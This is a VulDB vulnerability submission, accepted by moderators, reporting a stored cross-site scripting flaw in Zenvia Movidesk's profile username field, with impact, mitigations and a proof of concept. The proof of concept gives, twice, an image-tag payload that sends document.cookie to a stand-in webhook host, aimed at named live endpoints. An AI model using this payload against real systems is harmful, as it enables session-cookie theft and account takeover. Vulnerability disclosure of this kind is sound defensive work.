제출 #486023: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting정보

제목	zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting
설명	Vulnerability Summary A stored XSS vulnerability was identified in Zenvia's Moviedesk system. The flaw occurs in the username field, allowing the injection of malicious code. When an attacker changes the profile name to contain an XSS payload, the code is stored in the system and executed automatically when other users access the ticket viewing page, enabling a zero-click Account Takeover (ATO) attack. Vulnerability Details Vulnerable endpoint (profile editing):https://service.sigmatelecom.com.br/Account/EditProfile Endpoint where the XSS is triggered (ticket view):https://service.sigmatelecom.com.br/Ticket Payload used: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`> Impact Automatic execution of malicious code upon viewing tickets; Theft of session cookies, enabling Account Takeover without user interaction (0-click); Compromise of accounts with access to ticket data; Privilege escalation if the attacker gains access to administrator credentials. Recommendations to mitigate this vulnerability, it is recommended to: Input sanitization: Implement strict filtering and validation of user inputs in the "Username" field. Output escaping: Ensure that all displayed data is properly escaped to prevent code execution. HTTPOnly cookies: Configure session cookies with the HttpOnly flag to prevent JavaScript access. Content Security Policy (CSP): Implement a restrictive CSP to mitigate unauthorized code execution. Security audits: Conduct regular security testing to identify similar vulnerabilities. Proof of Concept (PoC) Access the profile editing endpoint:https://service.sigmatelecom.com.br/Account/EditProfile Change the username to the following payload: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`> Save the changes. Access the ticket page:https://service.sigmatelecom.com.br/Ticket Observe that the payload is executed and cookies are sent to the webhook.
원천	⚠️ https://service.sigmatelecom.com.br/Ticket
사용자	y4g0 (UID 80480)
제출	2025. 01. 21. AM 01:15 (1 년도 ago)
모더레이션	2025. 02. 02. AM 08:54 (12 days later)
상태	수락
VulDB 항목	294362 [Zenvia Movidesk 까지 25.01.22 Profile Editing /Account/EditProfile 사용자 이름 크로스 사이트 스크립팅]
포인트들	17

◂ 이전 개요 다음 ▸